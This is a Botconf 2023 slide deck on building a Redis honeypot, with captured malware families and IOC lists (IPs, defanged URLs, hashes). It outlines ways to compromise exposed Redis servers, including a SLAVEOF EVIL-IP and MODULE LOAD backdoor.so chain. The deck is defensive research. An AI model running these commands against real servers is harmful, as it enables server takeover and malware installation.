BOTCONF 2023 - @yarienkiva

Build your own Redis honeypot

  • Aloïs "Alol" de Souza-Coroller
  • @yarienkiva
  • Malware Analyst @CERT La Poste
  • HeroCTF organiser
  • https://heartathack.club

whoami

HeroCTF

12 - 14 / 05

https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware

Redis

Open source, in-memory data store used by millions of developers as a database, cache, streaming engine, and message broker.

"Designed to be totally insecure if exposed to the outside world." - antirez

Python

>>> pydict['key'] = 'value'
>>> pydict.get('key')
value

Redis

127.0.0.1:6379> set key value
OK
127.0.0.1:6379> get key
"value"

Serialization in Redis

*2\r\n$6\r\nHello,\r\n$11\r\nBotconf2023\r\n
*2    : n° of words
$6    : len. of word
Hello,: word
...
Hello, Botconf2023

How to pwn a Redis

  • Lua sandbox escape (or other CVE)
  • config set + ssh key/webshell/crontab
  • SLAVEOF + MODULE LOAD

SLAVEOF + MODULE LOAD

set dbfilename backdoor.so

REPLCONF (sync malicious RDB)

MODULE LOAD backdoor.so

SLAVEOF EVIL-IP

Inner workings

if attack:
    save_binary()
    return fake result
else:
    return redis result

Results

The honeypot was pushed to prod this morning  at 3AM so I haven't had the time to get any interesting results (or sleep), so ...

Free malware!

Results

Kiss-a-dog:
    - Coinminer
    - Tsunami (Backdoor)
    - Backdoor SSH
    - Diamorphine (Rootkit)


Watchdog:
    - Coinminer
    - SSH worm
 

IOCs

101.43.24.117
106.13.235.167
112.80.35.83
114.112.64.172
117.41.165.40
122.195.53.54
124.221.215.245
150.158.212.175
155.230.135.140
175.178.236.77
180.76.140.118
36.7.69.118
42.193.122.54
43.143.138.177
43.143.31.67
61.144.20.252
66.23.237.139
81.69.196.144
84.201.183.176

hxxp[://]s[.]na-cs[.]com/
hxxp[://]oracle[.]zzhreceive[.]top/
hxxp[://]kiss[.]a-dog[.]top
hxxp[://]45[.]83[.]123[.]29/
hxxp[://]en2an[.]top/

c85a554b87aa138e54d646dadde08854dfc461bc
67e05c827ce3e92d394b1f750ab227f222aa505f
1e3f5965bedb8562ac13a487ce956983ecd7cf0c

Thanks for listening

@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)

Results

Results

The honeypot was pushed to prod this morning  at 3AM so I haven't had the time to get any interesting results (or sleep), so ...

See you next year !

@yarienkiva - Aloïs - CERT La Poste
La Poste recrute ;)

SHOUTBOX :
- HeroCTF V5 12-14/05
- LT done, plz don't fire me Christophe

- Fumiko plz post more music on twitter

honeypot_redis

By Alol dSC

Made with Slides.com

honeypot_redis

  • 95

More from Alol dSC